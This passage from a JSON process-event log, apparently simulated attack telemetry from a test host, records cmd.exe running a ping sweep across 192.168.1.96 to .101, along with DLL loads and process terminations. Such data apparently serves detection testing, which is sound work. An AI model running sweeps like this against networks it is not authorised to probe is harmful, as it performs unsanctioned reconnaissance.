7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "process", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572446990000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.96", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4776, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "process", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572451840000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.97", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4800, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "process", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572456990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.98", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2992, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572457130000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457300000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "process", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572461990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.99", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2444, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "process", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572466830000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.100", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3592, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "process", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572471990000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.101", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 976, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572472130000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 976, - "process_name": "PING.EXE", - 